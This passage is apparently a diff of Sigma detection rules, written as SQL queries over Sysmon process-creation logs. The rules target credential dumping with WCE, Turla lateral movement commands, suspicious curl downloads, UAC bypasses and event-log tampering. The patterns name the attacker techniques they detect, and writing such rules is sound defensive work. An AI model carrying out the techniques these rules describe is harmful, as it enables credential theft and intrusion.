LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", - "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor 
(WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in 
order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "status": "test", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1053.005" + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR 
CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - 
"filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using 
Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": 
"Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": 
"Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. 
Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "status": "test", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": 
"ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", + "car.2013-10-002", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": 
"Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": 
"e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "status": "test", - "description": 